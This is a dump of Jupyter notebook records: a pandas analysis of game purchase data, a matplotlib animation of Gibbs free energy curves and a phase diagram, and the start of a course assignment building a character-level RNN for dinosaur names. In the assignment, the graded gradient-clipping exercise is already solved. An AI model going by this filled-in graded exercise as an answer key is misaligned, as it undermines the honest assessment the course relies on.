Avg Total Purchase per Person\nage_group_avg_total = age_group_sum[\"Total Purchase Value\"] / age_group_sum[\"Unique Value Count\"]\nage_group_sum[\"Avg Total Purchase per Person\"] = age_group_avg_total\n\n# Remove unique value count column from dataframe\ndel age_group_sum[\"Unique Value Count\"]\n# Formatting\nage_group_sum[\"Average Purchase Price\"] = age_group_sum[\"Average Purchase Price\"].map(\"${:.2f}\".format)\nage_group_sum[\"Total Purchase Value\"] = age_group_sum[\"Total Purchase Value\"].map(\"${:,.2f}\".format)\nage_group_sum[\"Avg Total Purchase per Person\"] = age_group_sum[\"Avg Total Purchase per Person\"].map(\"${:.2f}\".format)\n\nage_group_sum",
"_____no_output_____"
],
[
"# Top 5 Spenders \n\n# Total Purchase Value\ntop_total_purc = purchase_data.groupby([\"SN\"]).sum().sort_values(by=[\"Price\"], ascending = False)\ntop_total_purc = top_total_purc[\"Price\"].head(5)\ntop_total_purc_df = pd.DataFrame(top_total_purc)\n \n# Make lists for calculations\ntop_spender_count = []\navg_purc_price = []\nfor n in range(len(top_total_purc_df)):\n # Find Purchase Count for top 5 spenders by counting number of appearances in original data\n count = purchase_data.loc[purchase_data[\"SN\"] == top_total_purc_df.index[n]][\"SN\"].count()\n top_spender_count.append(count)\n # Average Purchase Price\n value = top_total_purc_df.iloc[n, 0] / count\n avg_purc_price.append(value)\n\n# Summary Data Frame\ntop_total_purc_df[\"Purchase Count\"] = top_spender_count\ntop_total_purc_df[\"Average Purchase Price\"] = avg_purc_price\ntop_total_purc_df = top_total_purc_df.rename(columns = {\"Price\" : \"Total Purchase Value\"})\n\n# Reformat price columns\ntop_total_purc_df[\"Average Purchase Price\"] = top_total_purc_df[\"Average Purchase Price\"].map(\"${:.2f}\".format)\ntop_total_purc_df[\"Total Purchase Value\"] = top_total_purc_df[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n# Rearrange columns\ntop_total_purc_df = top_total_purc_df[[\"Purchase Count\", \"Average Purchase Price\", \"Total Purchase Value\"]]\n\ntop_total_purc_df",
"_____no_output_____"
],
[
"# Top 5 Most Popular Items\nitem_df = purchase_data[[\"Item ID\", \"Item Name\", \"Price\"]]\n\n# Purchase Count\nitem_group_count = item_df.groupby([\"Item ID\", \"Item Name\"]).count().sort_values(by=[\"Item ID\"])\nitem_group_count = item_group_count.rename(columns = {\"Price\" : \"Purchase Count\"})\n #print(item_group_count.sort_values(by=[\"Purchase Count\"], ascending = False).head(10))\n# Total Purchase Value\nitem_group_sum = item_df.groupby([\"Item ID\", \"Item Name\"]).sum().sort_values(by=[\"Item ID\"])\nitem_group_sum = item_group_sum.rename(columns = {\"Price\" : \"Total Purchase Value\"})\n# Obtain Item Price by dropping duplicates\nitem_group_price = item_df.groupby([\"Item ID\", \"Item Name\"])[\"Price\"].mean()\nitem_group_price = item_df[[\"Item ID\", \"Item Name\", \"Price\"]].drop_duplicates()\n\n# Merge three dataframes into one\nmerge_item_1 = pd.merge(item_group_count, item_group_sum, on = [\"Item ID\", \"Item Name\"])\nmerge_item = pd.merge(merge_item_1, item_group_price, on = [\"Item ID\", \"Item Name\"])\n# Reset index\nmerge_item = merge_item.set_index([\"Item ID\", \"Item Name\"])\nmerge_item = merge_item.sort_values(by=[\"Purchase Count\", \"Total Purchase Value\"], ascending = False)\n# Column formatting\nmerge_item = merge_item.rename(columns = {\"Price\" : \"Item Price\"})\nmerge_item = merge_item[[\"Purchase Count\", \"Item Price\", \"Total Purchase Value\"]]\n\n# Save a copy for the next section before formatting data values\nmerge_item_df = merge_item.copy()\n\n# Formatting\nmerge_item[\"Item Price\"] = merge_item[\"Item Price\"].map(\"${:.2f}\".format)\nmerge_item[\"Total Purchase Value\"] = merge_item[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n\nmerge_item.head(5)\n#item_group_price1",
"_____no_output_____"
],
[
"# Top 5 Most Profitable Items\n\nmerge_item_df = merge_item_df.sort_values(by=[\"Total Purchase Value\"], ascending = False)\nmerge_item_df[\"Item Price\"] = merge_item_df[\"Item Price\"].map(\"${:.2f}\".format)\nmerge_item_df[\"Total Purchase Value\"] = merge_item_df[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n\nmerge_item_df.head(5)",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
],
[
"# Three Observable Trends\n\n# (1) According to the age range data, players aged 20-24 purchase the most items overall, while those aged 35-39 spend the most per person.\n# (2) Players who identify themselves as \"Other/Non-Disclosed\" or \"Female\" spend more per total purchase per person than males, $0.49 and $0.40 more respectively.\n# (3) \"Oathbreaker, Last Hope of the Breaking Storm\" is the most popular and the most profitable item with a total purchase count of 12 and total purchase value of $50.76.",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01dbe7d422bac27b5e7239e8abccc69ba8a2b1 | 82,361 | ipynb | Jupyter Notebook | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | 1 | 2022-03-18T11:11:18.000Z | 2022-03-18T11:11:18.000Z | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | null | null | null | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | 11 | 2021-05-24T00:54:58.000Z | 2021-10-30T23:51:21.000Z | 143.486063 | 62,288 | 0.850342 | [
[
[
"# The thermodynamics of ideal solutions\n\n*Authors: Enze Chen (University of California, Berkeley)*\n\nThis animation will show how the Gibbs free energy curves correspond to a lens phase diagram.\n\n## Python imports",
"_____no_output_____"
]
],
[
[
"# General libraries\nimport io\nimport os\n\n# Scientific computing libraries\nimport numpy as np\nfrom scipy.misc import derivative\nimport matplotlib\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport matplotlib.animation as animation\nfrom PIL import Image\nimport cv2\nfrom moviepy.editor import *",
"_____no_output_____"
]
],
[
[
"### Helper functions",
"_____no_output_____"
]
],
[
[
"# analytical function for the solid free energy curve\ndef curve_s(x, T, beta=0):\n \"\"\"This function plots the Gibbs free energy curve for the solid solution.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter in J/mol.\n \n Returns:\n G_s (numpy.ndarray): An array of Gibbs free energy values in kJ/mol. \n \"\"\"\n S_mix = -8.314 * (np.multiply(x, np.log(x)) + np.multiply(1 - x, np.log(1 - x)))\n H_mix = beta * np.multiply(x, 1 - x)\n G_s = -T * S_mix + H_mix\n return G_s / 1000\n\n# analytical function for the liquid free energy curve\ndef curve_l(x, T, beta=0):\n \"\"\"This function plots the Gibbs free energy curve for the liquid solution.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter in J/mol.\n \n Returns:\n G_l (numpy.ndarray): An array of Gibbs free energy values in kJ/mol. \n \"\"\"\n S_A, S_B = (52.7, 59.9)\n T_A, T_B = (1890 + 273, 1205 + 273)\n G_A = S_A * (T_A - T)\n G_B = S_B * (T_B - T)\n S_mix = -8.314 * (np.multiply(x, np.log(x)) + np.multiply(1 - x, np.log(1 - x)))\n H_mix = beta * np.multiply(x, 1 - x)\n G_l = x * G_B + (1 - x) * G_A - T * S_mix + H_mix\n return G_l / 1000",
"_____no_output_____"
],
[
"# find the common tangent using intersections and line search\ndef common_tangent(x, y1, y2, T, beta=0):\n \"\"\"This function calculates the common tangent of two convex curves.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n y1 (numpy.ndarray): y values for curve 1.\n y2 (numpy.ndarray): y values for curve 2.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter for the solid solution.\n \n Returns:\n line (numpy.ndarray): y values for the common tangent.\n idmin (int): Index of the x-coordinate of the first tangent point.\n idmax (int): Index of the x-coordinate of the second tangent point.\n \"\"\"\n # Compute a derivative\n dx = 1e-3\n dy1 = derivative(func=curve_s, x0=x, dx=dx, args=(T, beta,))\n\n # Make an initial guess at the minimum of curve 1\n n = len(x)\n idmin, idmax = (0, n)\n idx = np.argmin(y1)\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n\n # Construct the tangent line and count intersections with curve 2\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n\n # They're the same curve. Used for finding miscibility gap.\n # I'm assuming that the curve is symmetric\n if np.linalg.norm(y1 - y2) < 1e-4:\n idmin = np.argmin(y1[:int(n/2)])\n idmax = np.argmin(y1[int(n/2):]) + int(n/2)\n\n # If the tangent line intersects curve 2, shift tangent point to the left\n elif nnz >= 1:\n while nnz >= 1:\n idx -= 1\n # try-except to avoid an out-of-bounds error \n try:\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n except:\n break\n if diff.any():\n # Assign left and right indices of the tangent points\n # Here we do it each time because once we miss, we can't go back\n idmax = np.nonzero(diff)[0][0]\n idmin = idx\n\n # If the tangent line misses curve 2, shift tangent point to the right\n elif nnz < 1:\n while nnz < 1:\n idx += 1\n # try-except to avoid an out-of-bounds error \n try:\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n except:\n break\n # Assign left and right indices of the tangent points\n idmin = idx\n idmax = np.nonzero(diff)[0][0]\n \n # Return a tuple\n return (line, idmin, idmax)",
"_____no_output_____"
],
[
"# plot the Gibbs free energy curves\ndef plot_Gx(T=1800, beta_s=0, beta_l=0):\n \"\"\"This function is called by the widget to perform the plotting based on inputs.\n \n Args:\n T (float): The temperature in Kelvin.\n beta_s (float): The interaction parameter for solids in J/mol.\n beta_l (float): The interaction parameter for liquids in J/mol.\n \n Returns:\n None, but a pyplot is displayed.\n \"\"\"\n # For the given temperature, calculate the curves and common tangent\n n = int(1e4)\n xmin, xmax = (0.001, 0.999)\n x = np.linspace(xmin, xmax, n)\n y_s = curve_s(x, T, beta_s)\n y_l = curve_l(x, T, beta_l)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T, beta_s)\n\n # Mostly plot settings for visual appeal\n plt.rcParams.update({'figure.figsize':(8,6), 'font.size':20, \\\n 'lines.linewidth':4, 'axes.linewidth':2})\n fig, ax = plt.subplots()\n ymin, ymax = (-39, 19)\n ax.plot(x, y_s, c='C0', label='solid')\n ax.plot(x, y_l, c='C1', label='liquid')\n if abs(idmin) < n and abs(idmax) < n:\n ax.plot(x[idmin:idmax], line[idmin:idmax], c='k', lw=5, ls='-.')\n ax.vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=3)\n ax.tick_params(top=True, right=True, direction='in', length=10, width=2)\n ax.set_xlim(0, 1)\n ax.set_ylim(ymin, ymax)\n ax.set_xlabel(r'$x_{B}$')\n ax.set_ylabel(r'$\\Delta G$ (kJ/mol)')\n ax.set_title('Gibbs free energy at T = {} K'.format(T), fontsize=18)\n plt.legend()\n plt.show()",
"_____no_output_____"
]
],
[
[
"## Animations using `FuncAnimation`\n\nFinally!! VLC/Windows has buggy glitches, but the embedded HTML version looks fine.\nAlso, **extremely high quality and low memory footprint**!! 🎉",
"_____no_output_____"
]
],
[
[
"# Initialize quantities\nn = int(1e4)\nxmin, xmax = (0.001, 0.999)\nx = np.linspace(xmin, xmax, n)\nliquidus = []\nsolidus = []\nTs = np.arange(1300, 2301, 5)\n\n# Plot settings\nplt.rcParams.update({'figure.figsize':(7,9.5), 'font.size':16})\nfig, ax = plt.subplots(nrows=2, ncols=1, sharex=True)\n\n# Initialize plot settings\nymin, ymax = -39, 19\nax[0].set_xlim(0, 1)\nax[0].set_ylim(ymin, ymax)\nax[0].set_ylabel(r'$\\Delta G$ (kJ/mol)', fontsize=22)\nax[0].set_title('Binary ideal solution\\nFree energy vs. composition', fontsize=20)\nax[0].tick_params(axis='both', labelsize=20)\n\nTmin, Tmax = 1100, 2500\nax[1].set_xlabel(r'$x_{B}$', fontsize=22)\nax[1].set_ylabel(r'$T$ (K)', fontsize=22)\nax[1].set_ylim(Tmin, Tmax)\nax[1].set_title('Phase diagram', fontsize=20)\nax[1].tick_params(axis='both', labelsize=20)\n\n# Initialize the lines\nl1, = ax[0].plot([], [], c='C1', label='liquid')\nl2, = ax[0].plot([], [], c='C0', label='solid')\nl3, = ax[1].plot([], [], c='C1', label='liquidus')\nl4, = ax[1].plot([], [], c='C0', label='solidus')\nl5, = ax[1].plot([], [], c='gray', ls='dashed', lw=4, alpha=0.5, zorder=-5)\nv3, = ax[0].plot([], [], c='k', ls='-.')\nv1 = ax[0].vlines(x=[0], ymin=[0], ymax=[0], linestyles='dotted', linewidth=4, color='k')\nv2 = ax[1].vlines(x=[0], ymin=[0], ymax=[0], linestyles='dotted', linewidth=4, color='k')\nax[0].legend(loc='upper right')\nax[1].legend(loc='upper right')\nplt.tight_layout()\n\n# This is needed to avoid an extra loop\ndef init():\n l1.set_data([], [])\n return l1,\n\n# This does the enumeration\ndef animate(i):\n global ymin, ymax, Tmax, liquidus, solidus, x, n, Ts, v1, v2\n T = Ts[i]\n if T % 100 == 0:\n print(T)\n y_s = curve_s(x, T)\n y_l = curve_l(x, T)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T) # compute common tangent\n if idmin == 0 or idmin == n-1 or idmax == 0 or idmax == n-1:\n liquidus.append(None)\n solidus.append(None)\n else:\n liquidus.append(x[idmax])\n solidus.append(x[idmin])\n\n # set the data to be updated each iteration\n l1.set_data(x, y_l)\n l2.set_data(x, y_s)\n l3.set_data(liquidus, Ts[:np.where(Ts==T)[0][0]+1])\n l4.set_data(solidus, Ts[:np.where(Ts==T)[0][0]+1])\n l5.set_data([0, 1], [T, T])\n ax[0].annotate(text=f'$T={T}$ K', xy=(0.70, -33), fontsize=20, \n bbox=dict(fc='1.0', boxstyle='round'))\n \n # handle the tangent points\n if T == 2170:\n v1.remove()\n v2.remove()\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n v1.remove()\n v2.remove()\n v3.set_data(x[idmin:idmax], line[idmin:idmax])\n v1 = ax[0].vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=4, colors=['C0', 'C1'])\n v2 = ax[1].vlines(x=[x[idmin], x[idmax]], ymin=T, ymax=Tmax, linestyles='dotted', linewidth=4, colors=['C0', 'C1'])\n \n # return the artists that get updated (for blitting)\n return l1, l2, l3, l4, l5, v3, v2, v1\n\n# Create animation object\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=len(Ts), interval=1000, blit=True, repeat=False)\n\n# Save animation as MP4 (preferred)\n# anim.save('C:/Users/Enze/Desktop/test_funcanim.mp4', fps=9, dpi=300, writer='ffmpeg')\n# Save animation as GIF (file size MUCH larger!)\n# anim.save('C:/Users/Enze/Desktop/test_funcanim.gif', fps=9, dpi=300, writer='pillow') \n\nplt.show()",
"1300\n1400\n1500\n1600\n1700\n1800\n1900\n2000\n2100\n2200\n2300\n"
]
],
[
[
"## Other (sub-par) methods that I've tried...",
"_____no_output_____"
]
],
[
[
"# Accumulate images in a list for post-processing\nn = int(1e4)\nxmin, xmax = (0.001, 0.999)\nx = np.linspace(xmin, xmax, n)\nliquidus = []\nsolidus = []\nTs = np.arange(1300, 1450, 10)\n\nplt.rcParams.update({'figure.figsize':(7,9)})\nfig, ax = plt.subplots(nrows=2, ncols=1, sharex=True)\nfig.tight_layout()\nymin, ymax = -39, 19\nax[0].set_xlim(0, 1)\nax[0].set_ylim(ymin, ymax)\nax[0].set_ylabel(r'$\\Delta G$ (kJ/mol)')\n\nTmin, Tmax = 1100, 2500\nax[1].set_xlabel(r'$x_{B}$')\nax[1].set_ylabel(r'$T$ (K)')\nax[1].set_ylim(Tmin, Tmax)\nimages = []\n\nfor i,T in enumerate(Ts):\n if T % 100 == 0:\n print(T)\n y_s = curve_s(x, T)\n y_l = curve_l(x, T)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T)\n if idmin == 0 or idmin == n-1 or idmax == 0 or idmax == n-1:\n liquidus.append(None)\n solidus.append(None)\n else:\n liquidus.append(x[idmax])\n solidus.append(x[idmin])\n\n ax[0].plot(x, y_s, c='C0', label='solid')\n ax[0].plot(x, y_l, c='C1', label='liquid')\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n ax[0].plot(x[idmin:idmax], line[idmin:idmax], c='k', ls='-.')\n v1 = ax[0].vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=4, color='k')\n v2 = ax[1].vlines(x=[x[idmin], x[idmax]], ymin=T, ymax=Tmax, linestyles='dotted', linewidth=4, color='k')\n ax[0].legend(loc='upper right')\n\n ax[1].plot(liquidus, Ts[:i+1], c='C1', label='liquidus')\n ax[1].plot(solidus, Ts[:i+1], c='C0', label='solidus')\n ax[1].plot([0, 1], [T, T], c='gray', ls='dashed', lw=4, alpha=0.5, zorder=-5)\n ax[1].annotate(text=f'$T={T}$ K', xy=(0.7, 2320), fontsize=24, \n bbox=dict(fc='1.0', boxstyle='round'))\n \n# fig.savefig(f'C:/Users/Enze/Desktop/plots/fig_{T:4d}')\n \n # Convert to PIL image for GIF\n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n images.append(Image.open(buf))\n\n while len(ax[0].lines) > 0:\n ax[0].lines.remove(ax[0].lines[0])\n while len(ax[1].lines) > 0:\n ax[1].lines.remove(ax[1].lines[0])\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n v1.remove()\n v2.remove()\n\n# Make a GIF by converting from PIL Image\nmake_gif = True\nif make_gif: # Quality is pretty good!!\n images[0].save('C:/Users/Enze/Desktop/test_PIL3.gif', save_all=True, append_images=images[1:], optimize=False, duration=200, loop=0)\n print('Finished making GIF')",
"_____no_output_____"
]
],
[
[
"### Convert PIL images to mp4 using [OpenCV](https://docs.opencv.org/master/d6/d00/tutorial_py_root.html)\n\nOK, this works! \nQuality could be improved... this is where FuncAnimation native support would probably be better.",
"_____no_output_____"
]
],
[
[
"# This movie is very large in size!!\nopencv_images = [cv2.cvtColor(np.array(i), cv2.COLOR_RGB2BGR) for i in images]\nheight, width, channels = opencv_images[0].shape\nfourcc = cv2.VideoWriter_fourcc(*'MP4V') # can also be 'MJPG' or 'MP4V'\nvideo = cv2.VideoWriter(filename='C:/Users/Enze/Desktop/test_opencv.mp4', \n fourcc=fourcc, fps=6, frameSize=(width, height))\nfor i in opencv_images:\n video.write(i)\ncv2.destroyAllWindows()\nvideo.release()",
"_____no_output_____"
]
],
[
[
"### Convert figure files using [`moviepy`](https://moviepy.readthedocs.io/en/latest/index.html)\n\nQuality seems a little worse than OpenCV. \nAlso takes a longggg time lol, but the file size is very small!",
"_____no_output_____"
]
],
[
[
"datadir = 'C:/Users/Enze/Desktop/plots/'\nclips = [ImageClip(os.path.join(datadir, m)).set_duration(0.2) for m in os.listdir(datadir)]\nconcat = concatenate_videoclips(clips, method='compose')\nconcat.write_videofile('C:/Users/Enze/Desktop/test_moviepy.mp4', fps=10)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01dd68ebc12f210136309d77a63c4f35275091 | 75,600 | ipynb | Jupyter Notebook | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | 41.883657 | 1,599 | 0.571667 | [
[
[
"# Character level language model - Dinosaurus Island\n\nWelcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely! \n\n<table>\n<td>\n<img src=\"images/dino.jpg\" style=\"width:250;height:300px;\">\n\n</td>\n\n</table>\n\nLuckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath! \n\nBy completing this assignment you will learn:\n\n- How to store text data for processing using an RNN \n- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit\n- How to build a character-level text generation recurrent neural network\n- Why clipping the gradients is important\n\nWe will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment. ",
"_____no_output_____"
],
[
"## <font color='darkblue'>Updates</font>\n\n#### If you were working on the notebook before this update...\n* The current notebook is version \"3b\".\n* You can find your original work saved in the notebook with the previous version name (\"v3a\") \n* To view the file directory, go to the menu \"File->Open\", and this will open a new tab that shows the file directory.\n\n#### List of updates 3b\n- removed redundant numpy import\n* `clip`\n - change test code to use variable name 'mvalue' rather than 'maxvalue' and deleted it from namespace to avoid confusion.\n* `optimize`\n - removed redundant description of clip function to discourage use of using 'maxvalue' which is not an argument to optimize\n* `model`\n - added 'verbose mode to print X,Y to aid in creating that code.\n - wordsmith instructions to prevent confusion\n - 2000 examples vs 100, 7 displayed vs 10\n - no randomization of order\n* `sample`\n - removed comments regarding potential different sample outputs to reduce confusion.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom utils import *\nimport random\nimport pprint",
"_____no_output_____"
]
],
[
[
"## 1 - Problem Statement\n\n### 1.1 - Dataset and Preprocessing\n\nRun the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size. ",
"_____no_output_____"
]
],
[
[
"data = open('dinos.txt', 'r').read()\ndata= data.lower()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))",
"There are 19909 total characters and 27 unique characters in your data.\n"
]
],
[
[
"\n* The characters are a-z (26 characters) plus the \"\\n\" (or newline character).\n* In this assignment, the newline character \"\\n\" plays a role similar to the `<EOS>` (or \"End of sentence\") token we had discussed in lecture. \n - Here, \"\\n\" indicates the end of the dinosaur name rather than the end of a sentence. \n* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.\n* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character. \n - This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer. ",
"_____no_output_____"
]
],
[
[
"chars = sorted(chars)\nprint(chars)",
"['\\n', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n"
],
[
"char_to_ix = { ch:i for i,ch in enumerate(chars) }\nix_to_char = { i:ch for i,ch in enumerate(chars) }\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(ix_to_char)",
"{ 0: '\\n',\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h',\n 9: 'i',\n 10: 'j',\n 11: 'k',\n 12: 'l',\n 13: 'm',\n 14: 'n',\n 15: 'o',\n 16: 'p',\n 17: 'q',\n 18: 'r',\n 19: 's',\n 20: 't',\n 21: 'u',\n 22: 'v',\n 23: 'w',\n 24: 'x',\n 25: 'y',\n 26: 'z'}\n"
]
],
[
[
"### 1.2 - Overview of the model\n\nYour model will have the following structure: \n\n- Initialize parameters \n- Run the optimization loop\n - Forward propagation to compute the loss function\n - Backward propagation to compute the gradients with respect to the loss function\n - Clip the gradients to avoid exploding gradients\n - Using the gradients, update your parameters with the gradient descent update rule.\n- Return the learned parameters \n \n<img src=\"images/rnn.png\" style=\"width:450;height:300px;\">\n<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook \"Building a Recurrent Neural Network - Step by Step\". </center></caption>\n\n* At each time-step, the RNN tries to predict what is the next character given the previous characters. \n* The dataset $\\mathbf{X} = (x^{\\langle 1 \\rangle}, x^{\\langle 2 \\rangle}, ..., x^{\\langle T_x \\rangle})$ is a list of characters in the training set.\n* $\\mathbf{Y} = (y^{\\langle 1 \\rangle}, y^{\\langle 2 \\rangle}, ..., y^{\\langle T_x \\rangle})$ is the same list of characters but shifted one character forward. \n* At every time-step $t$, $y^{\\langle t \\rangle} = x^{\\langle t+1 \\rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.",
"_____no_output_____"
],
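[
"As a small, ungraded illustration of the relationship between $\\mathbf{X}$ and $\\mathbf{Y}$ described above (the name used here is made up):\n\n```python\nname = 'trex'                       # a hypothetical training example\nX = [c for c in name]               # ['t', 'r', 'e', 'x']\nY = [c for c in name][1:] + ['\\n']  # ['r', 'e', 'x', '\\n'], i.e. X shifted one step forward\n```\n\nAt every position $t$, the label $y^{\\langle t \\rangle}$ is just the next input character $x^{\\langle t+1 \\rangle}$, with the newline marking the end of the name.",
"_____no_output_____"
],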
[
"## 2 - Building blocks of the model\n\nIn this part, you will build two important blocks of the overall model:\n- Gradient clipping: to avoid exploding gradients\n- Sampling: a technique used to generate characters\n\nYou will then apply these two functions to build the model.",
"_____no_output_____"
],
[
"### 2.1 - Clipping the gradients in the optimization loop\n\nIn this section you will implement the `clip` function that you will call inside of your optimization loop. \n\n#### Exploding gradients\n* When gradients are very large, they're called \"exploding gradients.\" \n* Exploding gradients make the training process more difficult, because the updates may be so large that they \"overshoot\" the optimal values during back propagation.\n\nRecall that your overall loop structure usually consists of:\n* forward pass, \n* cost computation, \n* backward pass, \n* parameter update. \n\nBefore updating the parameters, you will perform gradient clipping to make sure that your gradients are not \"exploding.\"\n\n#### gradient clipping\nIn the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed. \n* There are different ways to clip gradients.\n* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N]. \n* For example, if the N=10\n - The range is [-10, 10]\n - If any component of the gradient vector is greater than 10, it is set to 10.\n - If any component of the gradient vector is less than -10, it is set to -10. \n - If any components are between -10 and 10, they keep their original values.\n\n<img src=\"images/clip.png\" style=\"width:400;height:150px;\">\n<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into \"exploding gradient\" problems. </center></caption>\n\n**Exercise**: \nImplement the function below to return the clipped gradients of your dictionary `gradients`. \n* Your function takes in a maximum threshold and returns the clipped versions of the gradients. \n* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html). \n - You will need to use the argument \"`out = ...`\".\n - Using the \"`out`\" parameter allows you to update a variable \"in-place\".\n - If you don't use \"`out`\" argument, the clipped variable is stored in the variable \"gradient\" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.",
"_____no_output_____"
]
],
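[
[
"Before implementing the graded `clip` function below, here is a minimal, ungraded sketch of element-wise clipping with `numpy.clip`, using the `out` argument to update an array in place (the example array is made up):\n\n```python\nimport numpy as np\n\ng = np.array([[12.0, -3.0], [-15.0, 4.0]])\nnp.clip(g, -10, 10, out=g)   # clips g in place to the range [-10, 10]\nprint(g)                     # [[ 10.  -3.]\n                             #  [-10.   4.]]\n```",
"_____no_output_____"
]
],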
[
[
"### GRADED FUNCTION: clip\n\ndef clip(gradients, maxValue):\n '''\n Clips the gradients' values between minimum and maximum.\n \n Arguments:\n gradients -- a dictionary containing the gradients \"dWaa\", \"dWax\", \"dWya\", \"db\", \"dby\"\n maxValue -- everything above this number is set to this number, and everything less than -maxValue is set to -maxValue\n \n Returns: \n gradients -- a dictionary with the clipped gradients.\n '''\n \n dWaa, dWax, dWya, db, dby = gradients['dWaa'], gradients['dWax'], gradients['dWya'], gradients['db'], gradients['dby']\n \n ### START CODE HERE ###\n # clip to mitigate exploding gradients, loop over [dWax, dWaa, dWya, db, dby]. (≈2 lines)\n for gradient in [dWaa, dWax, dWya, db, dby]:\n gradient = np.clip(gradient,-maxValue,maxValue,out = gradient)\n ### END CODE HERE ###\n \n gradients = {\"dWaa\": dWaa, \"dWax\": dWax, \"dWya\": dWya, \"db\": db, \"dby\": dby}\n \n return gradients",
"_____no_output_____"
],
[
